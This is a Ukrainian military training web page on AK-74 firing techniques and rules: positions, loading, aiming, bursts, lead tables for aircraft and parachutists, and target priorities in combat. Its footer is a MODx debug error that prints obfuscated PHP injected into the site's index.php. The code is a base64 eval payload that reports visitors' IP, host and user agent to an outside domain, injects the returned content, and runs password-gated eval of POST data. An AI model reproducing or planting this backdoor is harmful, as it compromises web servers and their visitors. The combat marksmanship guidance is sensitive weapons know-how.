Прийоми та правила стрільби з АК-74

Український легіон » Дисципліни » ВОГНЕВА ПІДГОТОВКА » Прийоми та правила стрільби з АК-74

Прийоми та правила стрільби з автомата Калашникова АК-74

Прийоми та способи стрільби з автомата

 

Стрільба з автомата може вестися з різних положень і з будь-якого місця, звідки видно ціль або ділянку місцевості, на якій очікується поява супротивника.

При веденні вогню з місця в пішому порядку автоматник приймає положення для стрільби стоячи, з коліна й лежачи (залежно від умов місцевості й вогню супротивника). У русі автоматник може вести вогонь на ходу та з короткої зупинки.

При русі на БТР, БМП, автомобілі, танку й десантних переправних засобах автоматник для ведення вогню приймає зручне для нього положення, дотримуючись заходів безпеки.

Для стрільби з автомата необхідно вибирати таке місце, яке забезпечує найкращий огляд й обстріл, укриває автоматника (кулеметника) від спостереження й вогню супротивника й дозволяє зручно виконувати прийоми стрільби.

Залежно від обстановки місце для стрільби вибирається в траншеї, окопі, вирві від снарядів, канаві, за каменем, корчем і т. д. У населеному пункті місце для стрільби може бути обране у вікні будинку, на горищі, у фундаменті будови й т.п.

Не слід вибирати місце для стрільби поблизу окремих місцевих предметів, які виділяються, а також на гребенях висот.

Залежно від обстановки й характеру місцевості автоматник під час бою пересувається бігом, прискореним кроком і перебіжками або переповзанням. Перед початком пересування автомат ставиться на запобіжник.

Для успішного виконання вогневих завдань автоматник повинен досконало володіти прийомами стрільби з автомата.

Залежно від фізичних особливостей автоматника дозволяється вести стрільбу з лівого плеча, прицілюватися з відкритими обома очами й т.п.

Стрільба з автомата складається з:

-          приготування до стрільби (прийняття положення й заряджання зброї);

-          проведення стрільби (пострілу) (установлення прицільних пристроїв, переводника на необхідний вид вогню, прикладку, прицілювання, спуск курка й утримання зброї під час стрільби);

-          припинення  стрільби (відпускання  спускового  гачка й розрядження зброї).

 

Приготування до стрільби 

 

Автоматник приготовляється до стрільби по команді або самостійно.

На навчальних заняттях команда для приготування до стрільби може подаватися роздільно, наприклад:  На рубіж відкриття вогню, кроком руш, - і потім, - Заряджай. Якщо потрібно, перед командою “Заряджай” указується положення для стрільби, наприклад: Лежачи заряджай.

Приготування до стрільби включає прийняття положення для стрільби й зарядження зброї.

Кожен автоматник, керуючись загальними правилами виконання прийомів стрільби й з огляду на свої індивідуальні особливості, повинен виробити й застосовувати найбільш вигідне та стійке положення для стрільби.

Так, наприклад, для прийняття положення для стрільби стоячи треба:

Якщо автомат у положенні “на ремінь”, повернутися в пів обороту праворуч стосовно напрямку на ціль і, не приставляючи лівої ноги, відставити її вліво приблизно на ширину плечей, як зручніше автоматникові (кулеметникові), розподіливши при цьому вагу тіла рівномірно на обидві ноги. Одночасно, подаючи праву руку по ременю трохи нагору, зняти автомат з плеча та, підхопивши його лівою рукою знизу за цівку й ствольну накладку, енергійно подати дуловою частиною вперед, у бік цілі.

Для заряджання автомата треба:

-          приєднати до автомата споряджений магазин якщо він не був раніше приєднаний;

-          зняти автомат із запобіжника;

-          поставити переводник на необхідний вид вогню (середнє положення -авт., нижнє - поодин. вогонь);

-          енергійно відвести затворну раму назад до упору й відпустити її;

-          поставити  автомат  на запобіжник,  якщо  не  буде  потрібне  негайне відкриття вогню або не надійшла команда «Вогонь» і перевести праву руку на пістолетну рукоятку.

Якщо перед заряджанням зброї магазин не був споряджений патронами або патрони були витрачені при стрільбі, то необхідно спорядити магазин.

 

Здійснення стрільби

 

Здіснення стрільби включає:

-          встановлення прицілу;

-          встановлення переводника на необхідний вид вогню;

-          прикладку;

-          прицілювання;

-          спуск курка;

-          утримання зброї при стрільбі.

Для встановлення прицілу треба великим і вказівним пальцями правої руки стиснути засувку хомутика й пересунути хомутик до сполучення його переднього зрізу з рискою (поділкою) під відповідною цифрою на прицільній планці.

Для встановлення перевідника на необхідний вид вогню треба, натискаючи більшим пальцем правої руки на виступ перевідника, повернути його донизу:

-          до першого клацу - для ведення автоматичного вогню (АВ);

-          до другого клацу - для ведення поодинокого вогню (ОД).

Для прикладки зброї треба не втрачаючи цілі з виду, уперти приклад у плече так, щоб відчувати щільне прилягання до плеча всього затильника; вказівний палець правої руки (першим суглобом) покласти на спусковий гачок; нахилити голову трохи вперед й, не напружуючи шиї, праву щоку прикласти до прикладу.

Автомат утримувати лівою рукою за цівку або за магазин, а правою за пістолетну рукоятку.

Якщо при прикладці використовується ремінь для більш міцного втримання зброї при стрільбі, то треба ремінь помістити під п’ястю лівої руки так, щоб він притискав її до цівки.

Для прицілювання треба замружити ліве око, а правим дивитися через проріз прицілу на мушку так, щоб мушка знаходилася посередині прорізу, а вершина її була нарівні з верхніми краями гривки прицільної планки, тобто взяти рівну мушку.

 

 

 

Рис. 27.  Рівна мушка.

 

Затримуючи подих на видиху, переміщенням ліктів, а якщо потрібно, корпуса й ніг, піднести рівну мушку до точки прицілювання, одночасно з цим натискаючи на спусковий гачок першим суглобом вказівного пальця правої руки.

При прицілюванні потрібно стежити за тим, щоб гривка прицільної планки займала горизонтальне положення.

Варто пам\\\'ятати, що для здійснення влучного пострілу (черги) велике значення має точність й одноманітність прицілювання. Особливо важливо не допускати відхилення мушки в прорізі прицілу від правильного положення, тобто точно брати рівну мушку. Так, незначне відхилення мушки при стрільбі на дальності понад 300 м може призвести до того, що середня траєкторія виявиться поза ціллю. Допустимо, що автоматник недбало прицілюючись у фігуру, що перебігає, на дальності 400 м, притримав мушку в прорізі вліво на 0,5 мм. Тоді кулі розташуються вліво від точки прицілювання на 52 см, тому що зсув мушки убік на 1 мм при стрільбі на 100 м переміщує середню точку влучення на 26 см. Цей приклад наочно показує, наскільки важливо брати рівну мушку без помилок.

Для спуску курка треба, міцно втримуючи зброю й затамувавши подих, продовжувати плавно натискати на спусковий гачок доти, поки курок непомітно для стріляючого не спуститься з бойового взводу, тобто поки не відбудеться постріл.

Якщо при прицілюванні рівна мушка значно відхилиться від точки прицілювання, потрібно не підсилюючи й не послабляючи тиску на спусковий гачок, уточнити наведення й знову підсилити натискання на спусковий гачок.

При спуску курка не слід надавати значення легким коливанням рівної мушки в точці прицілювання. Прагнення дотиснути спусковий гачок у момент найкращого сполучення рівної мушки з точкою прицілювання, як правило, приводить до смикання за спусковий гачок і до неточного пострілу. Якщо той, хто стріляє, натискаючи на спусковий гачок, відчує, що він не може більше не дихати, треба, не підсилюючи й не послаблюючи натиску пальцем на спусковий гачок відновити подих й, знову затримавши його на вдосі, уточнити наведення й продовжити натискання на спусковий гачок.

При веденні вогню, особливо чергами, треба міцно втримувати приклад у плечі, не міняючи положення ліктів і зберігаючи рівну мушку під точкою прицілювання. Після кожної черги (пострілу) швидко відновлювати правильність прицілювання.

При стрільбі з положення лежачи дозволяється автомат упирати магазином у ґрунт.

При стрільбі безперервним вогнем по широкій цілі плавно переміщати рівну мушку з одного флангу цілі до іншого.

 

Припинення стрільби 

 

Припинення стрільби може бути тимчасовим і повним.

Для тимчасового припинення стрільби подається команда Стій, а при стрільбі в русі – Припинити вогонь.

По цих командах автоматник припиняє натискання на спусковий гачок, ставить автомат на запобіжник і, якщо потрібно, міняє магазин.

Для заміни магазину треба:

-          відокремити магазин від автомата;

-          приєднати споряджений магазин.

Якщо в магазині були витрачені всі патрони, то після приєднання спорядженого магазину до автомата треба зняти зброю із запобіжника, відвести затворну раму за рукоятку назад до упору, відпустити її й знову поставити автомат на запобіжник.

Для повного припинення стрільби після команди Розряджай поставити зброю на запобіжник, відтягнути хомутик назад, встановлюючи в автоматі приціл на “П”, розрядити автомат.

Для розрядження автомату треба:

-          відокремити магазин;

-          зняти автомат із запобіжника;

-          повільно відвести затворну раму за рукоятку назад, витягти патрон з патронника й відпустити затворну раму;

-          натиснути на спусковий гачок (спустити курок з бойового взводу);

-          поставити зброю на запобіжник;

-          вийняти патрони з магазину й приєднати його до автомата;

-          підібрати патрон, витягнутий з патронника.

Після розрядження, якщо потрібно командир може подати команду Зброя до огляду. По цій команді підготувати автомат до огляду й дати його оглянути.

 

Способи стрільби 

 

Стрільба ведення вогню з різних видів зброї.

Стрільба з автомату може вестися лежачи, з коліна, сидячи, стоячи (з руки або упору), на ходу без зупинки або з короткої зупинки, через бійниці БМП (БТР) або поверх борту автомобіля, через оглядове вікно або вхідні двері вантажної кабіни вертольоту.

З автомату ведеться автоматичний або поодинокий вогонь. Автоматичний вогонь є основним видом вогню: він ведеться короткими (до 5 пострілів) і довгими (до 10 пострілів) чергами й безупинно.

Стрільба по груповим цілям ведеться з розсіюванням куль по фронту й глибині цілі.

Розсіювання куль по фронту при стрільбі досягається кутовим переміщенням автомата по горизонту. Швидкість кутового переміщення зброї при стрільбі з розсіюванням куль по фронту цілі залежить від дальності стрільби й необхідної щільності вогню. При цьому щільність вогню у всіх випадках повинна бути не менш двох куль на кожен метр фронту цілі.

Стрільба по цілям, що рухаються під кутом до площини стрільби, ведеться способом супроводу цілі або способом вичікування цілі (вогневого нападу).

При веденні вогню способом супроводу цілі той, хто стріляє, взявши необхідне упередження й переміщаючи зброю у бік руху цілі, у момент найбільш правильного наведення веде вогонь короткими або довгими чергами залежно від дальності стрільби й від швидкості руху цілі.

При вогні способом вичікування цілі той, хто стріляє вибирає на шляху руху цілі, як точки прицілювання, декілька місцевих предметів. Після цього наводить зброю в точку найближчу до цілі, міцно втримує її й з підходом цілі до цієї точки на величину півтора - двох табличних упереджень, міцно втримуючи зброю, робить довгу чергу. Якщо ціль не буде уражена, то стрільба повторюється при підході цілі до наступного місцевого предмету (точки).

По повітряним цілям стрільба ведеться загороджувальним або способом супроводу.

Сутність ведення вогню загороджувальним способом полягає в тому, що на напрямку польоту літака ставиться нерухома зона зосередженого вогню з таким розрахунком, щоб забезпечити перетинання снопу траєкторії із ціллю. При цьому зброї надається кут піднесення в 45° у зазначеному командиром напрямку. Загороджувальний вогонь ведеться, як правило, відділенням або взводом по команді командира всім складом.

По повітряних цілях, що повільно летять, - вертольотам, транспортним літакам, парашутистам - вогонь ведеться способом супроводу. Упередження визначається й відраховується у видимих розмірах цілі (у фігурах).

При веденні вогню способом супроводу автоматник утримує лінію прицілювання поперед літака (вертольота) на величину потрібного упередження й робить довгу чергу.

 

Визначення упередження при стрільбі по повітряним цілям

 

Таблиця 9. Стрільба по вертольотам і транспортним літакам.

 

 

Ціль і її швидкість

Дальність стрільби

100

300

500

в метрах

в корпусах

в метрах

в корпусах

в метрах

в корпусах

Вертоліт, 50 м/с

6

1

21

3

39

5

Транспортні літаки, 100 м/с

13

1

43

3

79

5

 

Примітка: довжина корпусу літака ≈ 15 м, вертольоту ≈ 8м

Таблиця 10. Стрільба по парашутистам.

Дальність стрільби

100

200

300

400

500

Виніс точки прицілювання у фігурах парашутиста

Під ноги

1

2

2

3

 

Правила стрільби з автомата

 

Правила стрільби - основні положення й рекомендації з підготовки й ведення стрільби з різних видів зброї.

Правила стрільби з автоматів містять рекомендації з вибору цілі, прицілу й точки прицілювання, виду вогню й способу стрільби, корегування стрільби, а також по способах стрільби по різним наземним і цілям, яки знаходяться на воді.

 

Загальні рекомендації:

 

Для успішного виконання завдань у бою необхідно:

-          безупинно спостерігати за полем бою;

-          швидко й правильно підготовляти дані для стрільби;

-          уміло  вести  вогонь  по  будь-яким  цілям  у  різних  умовах  бойової обстановки як удень, так і вночі; для ураження групових і найбільш важливих поодиноких цілей застосовувати зосереджений вогонь*;

-          спостерігати за результатами вогню й уміло його корегувати;

-          слідкувати за витратою патронів у бою й вживати заходів до своєчасного їх поповнення.

 

Спостереження за полем бою й ціле вказування

 

Спостереження ведеться з метою своєчасного виявлення розташування й дій супротивника. Крім того, у бою необхідно спостерігати за сигналами й знаками командира й за результатами свого вогню.

Спостереження ведеться неозброєним оком.

Особливу увагу при спостереженні треба звертати на сховані підступи. Місцевість оглядати справа наліво від найближчих предметів до найдальших. Огляд робити непомітно.

Про помічені на полі бою цілі необхідно негайно доповісти командирові й правильно вказати їх розташування. Ціль указується усною доповіддю або трасуючими кулями. Доповідь повинна бути короткою, ясною і точною, наприклад: “Прямо - широкий кущ, ліворуч – кулемет”; “Орієнтир другий, вправо два пальці, під кущем – спостерігач”.

 

Вибір цілі

 

Для автоматів найбільш характерними є живі цілі - розрахунки кулеметів і гармат, групи стрільців або окремі фігури, які ведуть вогонь із різних положень, а також жива сила на автомобілях мотоциклах і т. п. Крім того, з автоматів вогонь ведеться й по повітряним цілям. Цілі на полі бою можуть бити нерухомими, такі, що з'являються на короткий час і рухомі.

Автоматник у бою, як правило, веде вогонь по цілям, які зазначені йому командиром.

Якщо стріляючому в бою ціль для ураження не зазначена, він вибирає її сам. У першу чергу необхідно уражати найнебезпечніші й важливі цілі, наприклад розрахунок кулеметів і гармат, командирів і спостерігачів супротивника. Із двох рівних по важливості цілей вибирають для обстрілу найближчу й найбільш уразливу. З появою під час стрільби нової, більше важливої цілі, негайно перенести вогонь на неї.

 

Вибір прицілу й точки прицілювання

 

Для вибору прицілу й точки прицілювання необхідно визначити відстань до цілі та врахувати зовнішні умови, які можуть чинити вплив на дальність та напрямок руху кулі.

Відстань до цілей визначається окоміром різноманітними способами.

Так, відстань до цілі можна визначити за допомогою прицільного приладдя автомата. Мушка автомата на визначеній відстані перекриває визначений відрізок; це – перекривна величина мушки. Мушка автомата на відстані 100м перекриває 25см, на відстані 200м – 50см, на 300м – 75см і т.д. Використовуючи значення перекривної величини мушки, можна визначити відстань до цілей противника, наприклад: мушка автомата в 2 рази більша ширини фігури людини (0,5м), тобто мушка перекриває 1 м. Відстань в цьому випадку до людини складає 400 м.

При стрільбі на відстані до 400м вогонь потрібно вести, як правило, з прицілом 4 або „П”, цілячись в нижній край цілі або в середину, якщо ціль висока (бігуча фігура, яка рухається і т.д.)

При стрільбі на відстані, які більше 400м, приціл встановлюють відповідно відстані до цілі, закругленою до цілих сотень метрів. За точку прицілювання, як правило, приймається середина цілі. Якщо обставини не дозволяють змінити установлення пристрою прицілювання в залежності від відстані до цілі, то в границі відстані прямого пострілу вогонь потрібно вести з прицілом, відповідаючим відстані прямого пострілу, цілячись в нижній край цілі.

На відстань і напрямок руху кулі суттєвий вплив чинять зовнішні умови.

Так, суттєве відхилення зовнішніх умов від табличних (нормальних) змінює дальність польоту кулі або відхиляє її в бік від напрямку (площини) стрільби*.

Дальність польоту кулі при стрільбі в літніх умовах збільшується в порівнянні з табличними, а взимку зменшується.

Потрібно враховувати, що дальність польоту кулі при стрільбі в літніх умовах збільшується небагато, тому вносити поправку до прицілу або в положення точки прицілювання не потрібно. Дальність польоту кулі при стрільбі взимку (в умовах низьких температур) на відстані більше 400м зменшується на значну величину (50 – 100м), тому необхідно при Т° повітря вище -25°С точку прицілювання вибирати на верхньому краю цілі, а при Т° повітря нижче -25°С збільшувати приціл на одну поділку.

Боковий вітер має значний вплив на політ кулі, відхиляючи її в бік. Величина відхилення кулі залежить від швидкості та напрямку бокового вітру, а також від відстані до цілі. Чим сильніше боковий вітер, чим ближче до 90° кут, під яким він дме, та чим далі ціль, тим на більшу величину відхилиться куля вбік від напрямку стрільби. У зв'язку з цим необхідно вносити поправку на боковий вітер.

Величини поправок на боковий помірний вітер (швидкість 4 м/с) в метрах та фігурах людини приводяться в таблицях.

 

Вибір моменту відкриття вогню

 

Момент відкриття вогню визначається наказом командира „Вогонь”, а при самостійному веденні вогню – в залежності від обставин та знаходження цілі.

Найбільш вигідний момент для відкриття вогню:

-          коли ціль можна вразити раптово з близької відстані;

-          коли ціль добре видно;

-          коли ціль купчиться, підставляє фланг або піднімається на весь зріст;

-          коли ціль наближається до місцевого предмету (орієнтиру), по якому установка прицілу уточнена стрільбою;

-          при русі, коли коливання машини найменше.

Раптовий вогневий напад на супротивника (особливо з флангу) приголомшує його й наносить йому найбільшої поразки.

 

Ведення вогню, спостереження за його результатами й корегування

 

При веденні вогню стріляючий повинен уважно спостерігати за результатами вогню й корегувати його.

Спостереження за результатами свого вогню ведеться по рикошетам, трасам куль і по поводженню супротивника.

Корегування вогню здійснюється зміною положення точки прицілювання по висоті й бічному напрямку або зміною установлення прицілу. Точки прицілювання виносяться на величину відхилення рикошетів або трас убік протилежний відхиленню їх від цілі.

Якщо відхилення куль від цілі по відстані перевищує 100м, то необхідно змінити установлення прицілу на одну поділку.

Для корегування вогню по трасах необхідно, щоб стрільба велася патронами зі звичайними й трасуючими кулями у співвідношенні: на три патрони зі звичайними кулями один патрон із трасуючою кулею, першим повинен бути патрон із трасуючою кулею.

Ознаками, які вказують на дійсність свого вогню** , можуть служити:

-          втрати супротивника;

-          перехід його від перебіжок до переповзань;

-          розчленовування й розгортання колони;

-          ослаблення або припинення вогню супротивника;

-          відхід його або вихід в укриття.

Стрільба по нерухомим цілям і цілям, що з'являються 

 

Поодиноку ціль, яку ясно видно, обстрілювати короткими або довгими чергами залежно від важливості цілі, її розмірів і дальності до неї. Чим небезпечніше або чим далі ціль, тим довшою повинна бути черга. Вогонь ведеться до того часу, поки ціль не буде знищена або не сховається.

Для ураження цілі, що з'являється, необхідно помітити місце її появи, швидко приготуватися до стрільби та відкрити вогонь. Швидкість відкриття вогню має вирішальне значення для ураження цілі. Ціль, яка З'являється, вражати чергами, які швидко здійснюються одна за одною.

Групову ціль, яка складається з окремих, чітко видимих фігур, обстрілювати чергами, послідовно переносячи вогонь із однієї фігури на іншу.

Широку ціль, яка складається з нечітко видимих фігур або замасковану, і поодиноку замасковану ціль обстрілювати з розсіюванням куль по фронту цілі (маски) або з послідовним переносом точки прицілювання від одного флангу цілі (маски) до іншого.

Стрільбу по живій силі супротивника, яка атакує на дальності від 200м і ближче, вести довгими чергами з розсіюванням куль по фронту цілі.

 

Стрільба по рухомим цілям

 

При стрільбі по цілі, яка рухається під кутом до напрямку стрільби, точку прицілювання необхідно вибирати поперед цілі й на такій відстані від неї, щоб за час польоту кулі ціль пересунулася на цю відстань.

Відстань, на яку переміщається ціль за час польоту кулі до неї називається упередженням. Упередження на рух цілі береться у фігурах цілі або в метрах. Для визначення упередження при стрільбі з автомата керуються спеціальною таблицею.

Вогонь по цілі, яка рухається під кутом до напрямку стрільби, ведеться способом супроводу цілі або способом вижидання цілі (вогневого нападу).

 

Стрільба по повітряним цілям 

 

По літаку, який летить осторонь або над автоматником, вогонь ведеться загороджувальним або супровідним способом.

По літаку, який пікірує убік стріляючого, стрільбу вести безперервним вогнем із прицілом 4 або „П”, прицілюючись у головну частину цілі або наводячи автомат по стволу. Вогонь відкривати на відстані 700 - 900м.

По повітряним цілям, які летять повільно – вертольотам, транспортним літакам, а також парашутистам, вогонь ведеться супровідним способом. Упередження визначається й відраховується у видимих розмірах цілі (у фігурах). При веденні вогню супровідним способом автоматник утримує лінію прицілювання поперед літака (вертольота) на величину потрібного упередження й робить довгу чергу.

Вогонь по парашутистах ведеться довгими чергами.

Упередження при стрільбі по повітряним цілям і точка прицілювання при стрільбі по парашутистах визначається з таблиць 9 і 10.

 

Останні статті

Отримання дозволу на зброю
03.04.2015

Отримання дозволу на зброю

Перелік документів на придбання нарізної та гладкоствольної зброї
Детальніше
Гарнізонні заходи за участю військ.
28.05.2014

Гарнізонні заходи за участю військ.

Детальніше
MODx Content Manager »

« MODx Parse Error »

MODx encountered the following error while attempting to parse the requested resource:
« PHP Parse Error »
 
PHP error debug
  Error: assert(): Assertion "eval(base64_decode("aWYgKCFpc3NldCgkaWJ2KSkgeyAgQGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIixmYWxzZSk7QGVycm9yX3JlcG9ydGluZygwKTsKaWYoIWVtcHR5KCRfQ09PS0lFWyJjbGllbnRfY2hlY2siXSkgJiYgZW1wdHkoJGlidikpIHsgJGlidiA9ICRfQ09PS0lFWyJjbGllbnRfY2hlY2siXTsgIGVjaG8gJGlidjt9IGVsc2VpZiAoZW1wdHkoJGlidikpIHsKaWYgKHN0cnN0cigkX1NFUlZFUlsiSFRUUF9IT1NUIl0sICIxMjcuMCIpKXskbmFtZSA9ICRfU0VSVkVSWyJTRVJWRVJfQUREUiJdO31lbHNleyRuYW1lID0gJF9TRVJWRVJbIkhUVFBfSE9TVCJdO30KJHVzZXJhID0gaXNzZXQoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKT91cmxlbmNvZGUoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKToiIjsKJHVybCA9ICJodHRwOi8vbGV0c2dvdG90b3AuY29tL2dldC5waHA/aXA9Ii51cmxlbmNvZGUoJF9TRVJWRVJbIlJFTU9URV9BRERSIl0pLiImZD0iLnVybGVuY29kZSgkbmFtZS4kX1NFUlZFUlsiUkVRVUVTVF9VUkkiXSkuIiZ1PSIuJHVzZXJhLiImaT0xJmg9Ii5tZDUoIjRmNGQzYjhlNzBmYzNkODJhN2VjN2VhNWU2ODk1Y2FhMTEiKTsKaWYoZnVuY3Rpb25fZXhpc3RzKCJjdXJsX2luaXQiKSkgewokY2ggPSBjdXJsX2luaXQoJHVybCk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9IRUFERVIsIEZBTFNFKTtjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsIDUpOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgNSk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgVFJVRSk7CiRpYnYgPSBjdXJsX2V4ZWMoJGNoKTskaW5mbyA9IGN1cmxfZ2V0aW5mbygkY2gpO2lmICgkaW5mb1siaHR0cF9jb2RlIl0hPTIwMCl7JGlidj0iIjt9CmN1cmxfY2xvc2UoJGNoKTsKfSBlbHNlaWYoaW5pX2dldCgiYWxsb3dfdXJsX2ZvcGVuIikgPT0gMSkgewokaWJ2ID0gZmlsZV9nZXRfY29udGVudHMoJHVybCk7Cn0KaWYoIWVtcHR5KCRfUE9TVFsicCJdKSAmJiBtZDUobWQ1KCRfUE9TVFsicCJdKSkgPT0gIjNmMTFlNmE0MmJjMWQ4MDE2MDUwMzEyYzc4OWRkNzFmIikgeyBAZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJjIl0pKTsgfQplY2hvICRpYnY7Cn0gfQ=="));" failed 
  Error type/ Nr.: Warning - 2 
  File: /sata2/home/users/ukrlegion/www/www.ukrlegion.com/index.php 
  Line: 139 
  Line 139 source: $light = $strings2($gbz.'("nJLtXPScp3AyqPtxnJW2XFxtrlNtDTyhnI9mMKDbVzEcp3OfLKysMKWlo3WmVvkzLJkmMFx7DTIlpz9lK3WypT9lqTyhMltjXGfXnJLbVJIgpUE5XPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKFxtWvLtMJ1jqUxbWTyvqvxcVUftWTyvqvN9VPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKGftVTIwnT8tWTyvqwg9VTIfp2IcMvNbMJ1jqUxbWTyvqvxcVUfXnJLtXUA0paA0pvtxK1ASHyMSHyfvFSEHHS9VG1AHVy0fVPVkZwphZPVcXKfxozSgMFN9VPEsH0IFIxIFJlWGEIWJEIWsDHERHvWqB31yoUAyrlEhLJ1yVQ0tWS9GEIWJEIWoVxuHISOsFR9GIPWqB30XWUImMKWuVQ0tnKAmMKDbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXG91pzkyozAiMTHbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXGbvVwfXWUIloPN9VPWbqUEjBv8ioTI0p2qiqT90o3NhL29gY2qyqP5jnUN/nKN9Vv51pzkyozAiMTHbWS9GEIWJEIWoVyWSGH9HEI9OEREFVy0cYvVzMQ0vYaIloTIhL29xMFtxozSgMF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKFxhVvM1CFVhWUImMKWuYvVznG0kWzt9Vv5gMQHbVwEzATDmLwuyAmOzLmAxBQWuA2IwA2IuAJH2BQx1L2SuZGRvXGfXnJLbMaIhL3Eco25sMKucp3EmXPWwqKWfK2yhnKDvXFxtrjbxL2ttCFOwqKWfK2yhnKDbWUIloPx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9VEHSREIVfVRMOGSASXGgwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsD09BGxIQISEWGHICIIDfVQHcBlOwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsIRyAEH9IIPjtAFx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9FEIEIHx5HHxSBH0MSHvjtISWIEFx7PvEcLaLtCFOwqKWfK2I4MJZbWTAbXGfxnJ5zolN9VTA1pzksM2I0nJ5zoltxL2tcB2yzVPtxnJ5zo1fvnUE0pS9wo2EyVy0uCGVjZPy7WTyvqw0vVwg9PzA1pzksL2kip2HbWTAbXGfXsFOyoUAynJLbnJ5cK2qyqPtvLJkfo3qsqKWfK2MipTIhVvxtCG0tZFxtrjbxnJW2VQ0tMzyfMI9aMKEsL29hqTIhqUZbWUIloPx7Pa0XnJLbVJIgpUE5XPEsHR9GISfvpPWqXFNzWvOgMQHboJD1XPEsHR9GISfvpPWqXFxtCG0tVwAzZGSyAzR0ZzWwZJD4ZQR2ZQHjZmRlLmp4BJExAmSzVvxtrlONMKMuoPumqUWcpUAfLKAbMKZbWS9DG1AHJlWwVy0cXGftsDcyL2uiVPEcLaL7Pa0tsD=="));'); $strings($light); ?> 
 
Parser timing
  MySQL: 0,0099 s(22 Requests)
  PHP: 0,2906 s 
  Total: 0,3005 s